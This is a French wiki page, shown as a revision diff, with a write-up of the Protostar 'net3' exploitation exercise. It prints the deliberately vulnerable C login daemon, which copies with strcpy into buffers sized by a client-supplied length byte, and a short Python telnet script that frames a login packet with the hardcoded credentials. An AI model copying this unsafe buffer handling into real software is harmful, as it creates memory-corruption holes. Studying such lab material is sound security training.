Outils d'utilisateurs

Outils du Site


exploit_exercises_protostar:net3

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

exploit_exercises_protostar:net3 [2017/04/09 15:33] (Version actuelle)
Ligne 1: Ligne 1:
 +====== Net 3 ======
  
 +<code C>
 +#include "../common/common.c"
 +
 +#define NAME "net3"
 +#define UID 996
 +#define GID 996
 +#define PORT 2996
 +
 +/*
 +* Extract a null terminated string from the buffer 
 +*/
 +
 +    int get_string(char **result, unsigned char *buffer, u_int16_t len)
 +{
 +    unsigned char byte;
 +
 +    byte = *buffer;
 +
 +    if(byte > len) errx(1, "badly formed packet");
 +    *result = malloc(byte);
 +    strcpy(*result, buffer + 1);
 +
 +    return byte + 1;
 +}
 +
 +/*
 +* Check to see if we can log into the host
 +*/
 +
 +    int login(unsigned char *buffer, u_int16_t len)
 +{
 +    char *resource, *username, *password;
 +    int deduct;
 +    int success;
 +
 +    if(len < 3) errx(1, "invalid login packet length");
 +
 +    resource = username = password = NULL;
 +
 +    deduct = get_string(&resource, buffer, len);
 +    deduct += get_string(&username, buffer+deduct, len-deduct);
 +    deduct += get_string(&password, buffer+deduct, len-deduct);
 +
 +    success = 0;
 +    success |= strcmp(resource, "net3");
 +    success |= strcmp(username, "awesomesauce");
 +    success |= strcmp(password, "password");
 +
 +    free(resource);
 +    free(username);
 +    free(password);
 +
 +    return ! success;
 +}
 +
 +void send_string(int fd, unsigned char byte, char *string)
 +{
 +    struct iovec v[3];
 +    u_int16_t len;
 +    int expected;
 +
 +    len = ntohs(1 + strlen(string));
 +
 +    v[0].iov_base = &len;
 +    v[0].iov_len = sizeof(len);
 +
 +    v[1].iov_base = &byte;
 +    v[1].iov_len = 1;
 +
 +    v[2].iov_base = string;
 +    v[2].iov_len = strlen(string);
 +
 +    expected = sizeof(len) + 1 + strlen(string);
 +
 +    if(writev(fd, v, 3) != expected) errx(1, "failed to write correct amount of bytes");
 +
 +}
 +
 +void run(int fd)
 +{
 +    u_int16_t len;
 +    unsigned char *buffer;
 +    int loggedin;
 +
 +    while(1) {
 +        nread(fd, &len, sizeof(len));
 +        len = ntohs(len);
 +        buffer = malloc(len);
 +
 +        if(! buffer) errx(1, "malloc failure for %d bytes", len);
 +
 +        nread(fd, buffer, len);
 +
 +        switch(buffer[0]) {
 +            case 23: 
 +            loggedin = login(buffer + 1, len - 1);
 +            send_string(fd, 33, loggedin ? "successful" : "failed");
 +            break;
 +
 +            default:
 +            send_string(fd, 58, "what you talkin about willis?");
 +            break;
 +        }
 +    }
 +}
 +
 +int main(int argc, char **argv, char **envp)
 +{
 +    int fd;
 +    char *username;
 +
 +    /* Run the process as a daemon */
 +    background_process(NAME, UID, GID);  
 +
 +    /* Wait for socket activity and return */
 +    fd = serve_forever(PORT);
 +
 +    /* Set the client socket to STDIN, STDOUT, and STDERR */
 +    set_io(fd);
 +
 +    /* Don't do this :> */
 +    srandom(time(NULL));
 +
 +    run(fd);
 +}
 +
 +</code>
 +
 +Le but est d'envoyer un message sous le bon format pour que le programme nous affiche ''successful''.
 +
 +<code Python>
 +#!/usr/bin/env python
 +# encoding: utf-8
 +
 +import telnetlib
 +
 +ressource = "net3"
 +username = "awesomesauce"
 +password = "password"
 +
 +HOST = "192.168.1.29"
 +PORT = 2996
 +
 +t = telnetlib.Telnet(HOST, PORT)
 +
 +strSend  = "\x17"
 +strSend += "%c%s\x00" % (chr(len(ressource)+1), ressource)
 +strSend += "%c%s\x00" % (chr(len(username)+1), username)
 +strSend += "%c%s\x00" % (chr(len(password)+1), password)
 +
 +strSend = "\x00" + chr(len(strSend)) + strSend
 +
 +print "Send : %s" % repr(strSend)
 +
 +t.write(strSend)
 +print t.read_some()
 +
 +t.close()
 +</code>
exploit_exercises_protostar/net3.txt · Dernière modification: 2017/04/09 15:33 (modification externe)